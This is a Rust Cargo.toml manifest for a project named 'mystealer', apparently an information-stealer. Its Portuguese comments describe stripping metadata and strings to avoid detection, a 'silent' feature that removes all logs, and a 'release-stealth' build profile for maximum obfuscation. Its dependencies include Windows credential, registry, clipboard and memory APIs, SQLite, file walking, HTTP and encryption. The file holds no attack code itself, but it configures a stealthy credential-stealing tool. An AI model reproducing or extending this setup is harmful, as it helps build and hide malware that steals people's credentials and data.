[package]
name = "mystealer"
version = "0.3.0"
edition = "2021"
# Remove metadata para evitar strings no binário
# authors, description removidos intencionalmente

[features]
default = ["lab-mode"]
lab-mode = []
release = []
hydra = []
hydra-auto = []
silent = []  # Remove TODOS os logs e strings de debug

[dependencies]
tokio = { version = "1.35", features = ["full"] }
serde = { version = "1.0", features = ["derive"] }
serde_json = "1.0"
aes-gcm = "0.10"
argon2 = "0.5"
rand = "0.8"
base64 = "0.21"
chrono = { version = "0.4", features = ["serde"] }
uuid = { version = "1.6", features = ["v4", "serde"] }
thiserror = "1.0"
anyhow = "1.0"
tracing = "0.1"
tracing-subscriber = { version = "0.3", features = ["env-filter"] }
reqwest = { version = "0.11", features = ["json", "rustls-tls"], default-features = false }
dirs = "5.0"
sysinfo = "0.30"
whoami = "1.4"
regex = "1.10"
walkdir = "2.4"
sha2 = "0.10"
hex = "0.4"
rusqlite = { version = "0.31", features = ["bundled"] }
clap = { version = "4.4", features = ["derive"] }

[target.'cfg(windows)'.dependencies]
windows = { version = "0.52", features = [
    "Win32_Foundation",
    "Win32_Security",
    "Win32_Security_Credentials",
    "Win32_System_Threading",
    "Win32_System_SystemInformation",
    "Win32_System_Registry",
    "Win32_System_DataExchange",
    "Win32_System_Memory",
    "Win32_System_Diagnostics_Debug",
    "Win32_UI_WindowsAndMessaging",
    "Win32_Networking_WinSock",
]}

[target.'cfg(unix)'.dependencies]
nix = { version = "0.27", features = ["user", "process"] }

[dev-dependencies]
tempfile = "3.9"

# ============================================================================
# RELEASE PROFILE - MÁXIMA OFUSCAÇÃO
# ============================================================================
[profile.release]
# Otimização agressiva
opt-level = "z"          # Otimiza para tamanho (também ajuda a remover strings)
lto = "fat"              # Link-Time Optimization completo
codegen-units = 1        # Melhor otimização, mais inline
panic = "abort"          # Remove unwind tables e panic strings
strip = "symbols"        # Remove todos os símbolos

# Remove debug info
debug = 0
debug-assertions = false
overflow-checks = false
incremental = false
rpath = false

# ============================================================================
# RELEASE STEALTH - AINDA MAIS AGRESSIVO
# ============================================================================
[profile.release-stealth]
inherits = "release"
opt-level = "z"
lto = "fat"
codegen-units = 1
panic = "abort"
strip = "symbols"
debug = 0
debug-assertions = false
overflow-checks = false

# Força inline de funções pequenas (remove mais strings de panic)
[profile.release-stealth.package."*"]
opt-level = "z"
